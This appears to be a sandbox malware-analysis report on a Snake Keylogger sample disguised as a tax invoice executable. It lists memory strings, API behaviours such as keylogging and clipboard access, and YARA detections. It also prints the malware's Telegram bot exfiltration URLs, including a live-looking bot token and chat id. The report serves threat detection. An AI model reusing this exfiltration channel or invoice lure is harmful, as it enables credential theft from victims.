Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: RegSvcs.exe, 00000002.00000002.3702479918.000000000297F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.00000000029F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.000000000297F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.3702479918.00000000029AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: RegSvcs.exe, 00000002.00000002.3702479918.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.00000000029AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/8
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00E94164
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00E94164
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E93F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00E93F66
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00E8001C
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00EACABC

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: This is a third-party compiled AutoIt script. 0_2_00E23B3A
Source: (STC) Tax Invoice 25030216_REV.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000000.1225564726.0000000000ED4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_13106f11-f
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000000.1225564726.0000000000ED4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_0971a586-c
Source: (STC) Tax Invoice 25030216_REV.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_631d4ede-7
Source: (STC) Tax Invoice 25030216_REV.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_81616017-c
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: (STC) Tax Invoice 25030216_REV.exe
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00E8A1EF
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E78310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E78310
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00E851BD
Detected potential crypto function
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E2E6A0 0_2_00E2E6A0
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4D975 0_2_00E4D975
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E2FCE0 0_2_00E2FCE0
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E421C5 0_2_00E421C5
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E562D2 0_2_00E562D2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA03DA 0_2_00EA03DA
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E5242E 0_2_00E5242E
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E425FA 0_2_00E425FA
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E366E1 0_2_00E366E1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E7E616 0_2_00E7E616
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E5878F 0_2_00E5878F
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E88889 0_2_00E88889
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E56844 0_2_00E56844
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA0857 0_2_00EA0857
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E38808 0_2_00E38808
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4CB21 0_2_00E4CB21
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E56DB6 0_2_00E56DB6
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E36F9E 0_2_00E36F9E
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E33030 0_2_00E33030
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4F1D9 0_2_00E4F1D9
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E43187 0_2_00E43187
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E21287 0_2_00E21287
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E41484 0_2_00E41484
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E35520 0_2_00E35520
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E47696 0_2_00E47696
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E35760 0_2_00E35760
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E41978 0_2_00E41978
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E59AB5 0_2_00E59AB5
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA7DDB 0_2_00EA7DDB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4BDA6 0_2_00E4BDA6
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E41D90 0_2_00E41D90
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E33FE0 0_2_00E33FE0
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E2DF00 0_2_00E2DF00
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01663A98 0_2_01663A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BD2C9 2_2_027BD2C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B5378 2_2_027B5378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BC147 2_2_027BC147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BC788 2_2_027BC788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BD599 2_2_027BD599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BCA58 2_2_027BCA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BF804 2_2_027BF804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B69A8 2_2_027B69A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B3E09 2_2_027B3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BCFF7 2_2_027BCFF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B6FD0 2_2_027B6FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BEC18 2_2_027BEC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BCD28 2_2_027BCD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B9DE0 2_2_027B9DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BFC52 2_2_027BFC52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027BEC0A 2_2_027BEC0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054081D0 2_2_054081D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407B78 2_2_05407B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05408FB0 2_2_05408FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E540 2_2_0540E540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05400D48 2_2_05400D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C54F 2_2_0540C54F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E550 2_2_0540E550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540815A 2_2_0540815A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A55F 2_2_0540A55F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C560 2_2_0540C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A570 2_2_0540A570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E9D0 2_2_0540E9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E9E0 2_2_0540E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C9E0 2_2_0540C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C9F0 2_2_0540C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A9F0 2_2_0540A9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054015F7 2_2_054015F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054015F8 2_2_054015F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540119F 2_2_0540119F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054011A0 2_2_054011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05400040 2_2_05400040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540BC40 2_2_0540BC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05409C44 2_2_05409C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05409C50 2_2_05409C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540345F 2_2_0540345F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05403460 2_2_05403460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05403007 2_2_05403007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05403008 2_2_05403008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540DC1F 2_2_0540DC1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540FC20 2_2_0540FC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540BC2F 2_2_0540BC2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406030 2_2_05406030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540DC30 2_2_0540DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E0C0 2_2_0540E0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C0C0 2_2_0540C0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540C0D0 2_2_0540C0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A0D0 2_2_0540A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540A0E0 2_2_0540A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054008F0 2_2_054008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406488 2_2_05406488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05400498 2_2_05400498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540E0B0 2_2_0540E0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054038B8 2_2_054038B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402757 2_2_05402757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402758 2_2_05402758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407B77 2_2_05407B77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402300 2_2_05402300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F300 2_2_0540F300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D300 2_2_0540D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D310 2_2_0540D310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B310 2_2_0540B310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407720 2_2_05407720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B320 2_2_0540B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05407722 2_2_05407722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05405328 2_2_05405328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054097C0 2_2_054097C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05405BD8 2_2_05405BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05405780 2_2_05405780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F781 2_2_0540F781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F790 2_2_0540F790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D791 2_2_0540D791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540D7A0 2_2_0540D7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B7A0 2_2_0540B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05408FA1 2_2_05408FA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402BAF 2_2_05402BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05402BB0 2_2_05402BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540B7B0 2_2_0540B7B0
